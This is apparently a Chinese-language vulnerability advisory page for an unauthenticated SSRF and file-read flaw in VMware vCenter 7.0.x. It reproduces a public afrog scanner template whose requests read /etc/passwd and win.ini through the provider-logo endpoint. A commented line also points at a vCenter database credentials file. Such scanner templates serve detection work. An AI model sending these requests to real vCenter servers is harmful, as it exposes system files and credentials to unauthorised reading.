vmware-vcenter-provider-logo-ssrf: Vmware VCenter - Arbitrary File Read

日期: 2025-09-01 | 影响软件: Vmware VCenter | POC: 已公开

漏洞描述

VMware vCenter v 7.0.x 的某些版本中存在未授权 SSRF 漏洞，可以读取本地文件造成敏感信息泄露；读取远程文件形成 XSS 漏洞。

PoC代码[已公开]

id: vmware-vcenter-provider-logo-ssrf

info:
  name: Vmware VCenter - Arbitrary File Read
  author: xpoc
  severity: critical
  verified: true
  description: |-
    VMware vCenter v 7.0.x 的某些版本中存在未授权 SSRF 漏洞，可以读取本地文件造成敏感信息泄露；读取远程文件形成 XSS 漏洞。
  tags: vmware,vmware-vcenter,lfi,ssrf
  created: 2024/01/05

rules:
  r0:
    request:
      method: GET
      path: /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
  r1:
    request:
      method: GET
      #path: /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///C:/ProgramData/VMware/vCenterServer/cfg/vmware-vpx/vcdb.properties
      path: /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///c://windows/win.ini
    expression: response.status == 200 && response.body.bcontains(b"bit app support")
expression: r0() || r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/vmware-vcenter-provider-logo-ssrf.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐